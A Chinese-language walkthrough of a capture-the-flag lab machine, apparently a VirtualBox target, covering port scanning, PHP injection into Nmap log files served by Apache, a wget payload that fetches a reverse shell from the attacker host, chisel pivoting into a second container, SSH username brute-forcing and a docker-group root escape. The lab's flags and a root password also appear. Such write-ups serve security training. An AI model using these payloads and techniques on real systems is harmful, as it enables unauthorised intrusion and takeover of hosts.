信息收集

服务探测

❯ sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1    00:50:56:c0:00:08       (Unknown)
192.168.60.2    00:50:56:e3:f6:57       (Unknown)
192.168.60.177  08:00:27:a0:2c:8b       (Unknown)
192.168.60.254  00:50:56:e4:ae:23       (Unknown)

9 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.979 seconds (129.36 hosts/sec). 4 responded
❯ export ip=192.168.60.177
❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
With RustScan, I scan ports so fast, even my firewall gets whiplash 💨

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.177:22
Open 192.168.60.177:80
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-07 21:28 CST
Initiating ARP Ping Scan at 21:28
Scanning 192.168.60.177 [1 port]
Completed ARP Ping Scan at 21:28, 0.08s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 21:28
Completed Parallel DNS resolution of 1 host. at 21:28, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 21:28
Scanning 192.168.60.177 [2 ports]
Discovered open port 22/tcp on 192.168.60.177
Discovered open port 80/tcp on 192.168.60.177
Completed SYN Stealth Scan at 21:28, 0.05s elapsed (2 total ports)
Nmap scan report for 192.168.60.177
Host is up, received arp-response (0.00043s latency).
Scanned at 2025-02-07 21:28:42 CST for 0s

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 64
80/tcp open  http    syn-ack ttl 63
MAC Address: 08:00:27:A0:2C:8B (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.32 seconds
           Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

看一下80端口，apache的默认页面

❯ whatweb -v $ip
WhatWeb report for http://192.168.60.177
Status    : 200 OK
Title     : Apache2 Debian Default Page: It works
IP        : 192.168.60.177
Country   : RESERVED, ZZ

Summary   : Apache[2.4.62], HTTPServer[Debian Linux][Apache/2.4.62 (Debian)]

Detected Plugins:
[ Apache ]
        The Apache HTTP Server Project is an effort to develop and
        maintain an open-source HTTP server for modern operating
        systems including UNIX and Windows NT. The goal of this
        project is to provide a secure, efficient and extensible
        server that provides HTTP services in sync with the current
        HTTP standards.

        Version      : 2.4.62 (from HTTP Server Header)
        Google Dorks: (3)
        Website     : http://httpd.apache.org/

[ HTTPServer ]
        HTTP server header string. This plugin also attempts to
        identify the operating system from the server header.

        OS           : Debian Linux
        String       : Apache/2.4.62 (Debian) (from server string)

HTTP Headers:
        HTTP/1.1 200 OK
        Date: Fri, 07 Feb 2025 13:28:54 GMT
        Server: Apache/2.4.62 (Debian)
        Last-Modified: Tue, 04 Feb 2025 10:56:19 GMT
        ETag: "29cd-62d4edbdf5ee5-gzip"
        Accept-Ranges: bytes
        Vary: Accept-Encoding
        Content-Encoding: gzip
        Content-Length: 3041
        Connection: close
        Content-Type: text/html

Nmap入口

扫一波目录，发现有个目录，因为这个Anonymous-Connections首字母是大写的所以用的不是lowercase字典不然扫不到

❯ gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.60.177
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/server-status        (Status: 403) [Size: 279]
/Anonymous-Connections (Status: 301) [Size: 332] [--> http://192.168.60.177/Anonymous-Connections/]

发现是个集成了nmap功能的web❓

尝试扫一下本地，发现并没有开放22端口，猜测该web存在docker中

而且这个扫完会将结果保存在127.0.0.1.log中

尝试进一步扫描

找到日志保存的目录/victims

❯ gobuster dir -u http://$ip/Anonymous-Connections -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.60.177/Anonymous-Connections
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/victims              (Status: 301) [Size: 340] [--> http://192.168.60.177/Anonymous-Connections/victims/]

发现确实会保存在后缀为.log的文件中

❯ curl http://192.168.60.177/Anonymous-Connections/victims/127.0.0.1.log
Starting Nmap 7.93 ( https://nmap.org ) at 2025-02-07 13:38 UTC
Nmap scan report for 127.0.0.1
Host is up (0.00027s latency).
Not shown: 499 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.62 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.62 (Debian)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.91 seconds

不过如何利用这个来拿到shell呢？

正常情况下log文件并不会被php解析，也不能改文件后缀

猜测配置了htaccess文件，将log文件同样当作php解析

那就尝试注入php代码

这里由flower大佬提供思路

利用python的flask构造一个响应包

from flask import Flask, make_response

app = Flask(__name__)

@app.route('/')
def index():
    response = make_response("<?php phpinfo();?>")
    response.headers['Server'] = '<?php phpinfo();?>'
    return response

if __name__ == '__main__':
    app.run(host='0.0.0.0', port=83)

我在kali中启动flask监听83端口，利用靶机的web扫一下kali

php正常的被写入log文件了

尝试访问一下log

结果真的会被解析

简单看了一下，发现地址是172.17.0.2，还真是在docker中

在这里还有另一种方案，可以利用robots.txt，在里面写入php代码，nmap会自动将robots.txt写入log

1
2
3

User-agent: *

Allow: /<?php phpinfo();?>

那就好办了，看下有没有被ban掉的函数，尝试弹个shell过来

我尝试一句话木马，发现并没有回显

只能wget反弹rev.php再执行

nmap扫完打开log看看是否执行

##修改此内容
response = make_response("<?php system('wget 192.168.60.100/rev.php');?>")
---------------------分隔------------------
192.168.60.177 - - [07/Feb/2025:22:37:04 +0800] "GET /rev.php HTTP/1.1" 200 9288 "-" "Wget/1.21.3"

用户提权

监听端口，拿到docker中的shell了

❯ pwncat-cs -lp 4444
[22:37:28] Welcome to pwncat 🐈!                                                                                                       __main__.py:164
[22:37:30] received connection from 192.168.60.177:52176                                                                                    bind.py:84
[22:37:30] 0.0.0.0:4444: upgrading from /usr/bin/dash to /usr/bin/bash                                                                  manager.py:957
[22:37:31] 192.168.60.177:52176: registered new host w/ db                                                                              manager.py:957
(local) pwncat$

(remote) hacktivist@debian1:/var/www/html/Anonymous-Connections/victims$ id
uid=1000(hacktivist) gid=1000(hacktivist) groups=1000(hacktivist),27(sudo)
(remote) hacktivist@debian1:/var/www/html/Anonymous-Connections/victims$ sudo -l
Matching Defaults entries for hacktivist on debian1:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User hacktivist may run the following commands on debian1:
    (ALL : ALL) NOPASSWD: ALL

你可以发现这个主机名为debian1，那必然还有一个debian2

在root家目录下看到history给了提示

看了一下ip，发现有个10网段的，猜测debian2在10网段

(remote) hacktivist@debian1:/home/hacktivist$ sudo su
AH00558: apache2: Could not reliably determine the server's fully qualified domain name, using 172.17.0.2. Set the 'ServerName' directive globally to suppress this message
httpd (pid 8) already running
root@debian1:/home/hacktivist# cd ~
root@debian1:~# ls -al
total 28
drwx------ 1 root root 4096 Feb  4 23:15 .
drwxr-xr-x 1 root root 4096 Feb  4 10:48 ..
-rw------- 1 root root  137 Feb  7 14:44 .bash_history
-rw-r--r-- 1 root root  605 Feb  4 11:03 .bashrc
drwxr-xr-x 3 root root 4096 Feb  4 14:49 .local
-rw-r--r-- 1 root root  161 Jul  9  2019 .profile
root@debian1:~# cat .bash_history
echo 'root:$uP3r_$3cUr3_D0ck3r' | chpasswd
cd
nano .bash_history
exit
id
cd ~
ls
ls -al
cd /home/
ls
cd hacktivist/
ls
ls -al
exit
exit
root@debian1:~# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
5: eth0@if6: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
    link/ether 02:42:ac:11:00:02 brd ff:ff:ff:ff:ff:ff link-netnsid 0
    inet 172.17.0.2/16 brd 172.17.255.255 scope global eth0
       valid_lft forever preferred_lft forever
9: eth1@if10: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
    link/ether 02:42:0a:0a:0a:0a brd ff:ff:ff:ff:ff:ff link-netnsid 0
    inet 10.10.10.10/24 brd 10.10.10.255 scope global eth1
       valid_lft forever preferred_lft forever

内网探测

利用靶机自带的nmap扫一下10网段

发现20主机下开放2222端口

(remote) hacktivist@debian1:/tmp$ nmap 10.10.10.10/24
Starting Nmap 7.93 ( https://nmap.org ) at 2025-02-07 15:02 UTC
Nmap scan report for 10.10.10.1
Host is up (0.00022s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap scan report for debian1 (10.10.10.10)
Host is up (0.00024s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT   STATE SERVICE
80/tcp open  http

Nmap scan report for debian2.private (10.10.10.20)
Host is up (0.00026s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT     STATE SERVICE
2222/tcp open  EtherNetIP-1

Nmap done: 256 IP addresses (3 hosts up) scanned in 3.51 seconds

传个chisel端口转发一下

(local) pwncat$ upload chisel
./chisel ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100.0% • 9.4/9.4 MB • 1.1 MB/s • 0:00:00
[22:48:52] uploaded 9.37MiB in 9.94 seconds                                                                                               upload.py:76
(local) pwncat$                                                            

(remote) hacktivist@debian1:/tmp$ ls
chisel
(remote) hacktivist@debian1:/tmp$ chmod +x chisel              
(remote) hacktivist@debian1:/tmp$ ./chisel client 192.168.60.100:2333 R:2222:10.10.10.20:2222

kali监听2333端口，你会发现本地会有个2222端口映射

❯ ./chisel server --reverse -p 2333
2025/02/07 22:51:16 server: Reverse tunnelling enabled
2025/02/07 22:51:16 server: Fingerprint CqFV5hn41DlTjjQ6h1BkwH/yLg0/Pu3yFXjRf0x1zKU=
2025/02/07 22:51:16 server: Listening on http://0.0.0.0:2333
2025/02/07 23:05:02 server: session#3: tun: proxy#R:2222=>10.10.10.20:2222: Listening
-----------------------------分隔-----------------
❯ ssh [email protected] -p 2222
[email protected]'s password:
Linux debian2 6.1.0-30-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.124-1 (2025-01-12) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Feb  4 23:12:09 2025 from 10.10.10.1
root@debian2:~#

这里不用端口转发也行，docker上没有ssh，现装一个就可以了

进入debian2看了下history，发现ssh中有私钥文件

那大概率就是登录10.10.10.1也就是宿主机的私钥了

但是我们并不知道私钥所对应的用户名，大概率也不会是root

那就是爆破用户名了

将私钥down到本地

1
2
3

❯ export ip=192.168.60.177
❯ chmod 600 id_rsa
❯ for i in $(cat names.txt);do ssh $i@$ip -i id_rsa;done

输入完yes，一直敲回车

Root提权

最后拿到alfredo用户

alfredo@anon:~$ id
uid=1000(alfredo) gid=1000(alfredo) grupos=1000(alfredo),109(docker)
alfredo@anon:~$ cat user.txt
af13f20ce2fb4266b4d381cf8f60f85f

看到用户在docker组中

docker提权结束了

alfredo@anon:~$ docker run -v /:/mnt --rm -it alpine chroot /mnt sh
Unable to find image 'alpine:latest' locally
latest: Pulling from library/alpine
1f3e46996e29: Pull complete
Digest: sha256:56fa17d2a7e7f168a043a2712e63aed1f8543aeafdcee47c58dcffe38ed51099
Status: Downloaded newer image for alpine:latest
# cat /root/root.txt
f3a421bdd1e5119f49c3fda29838cf79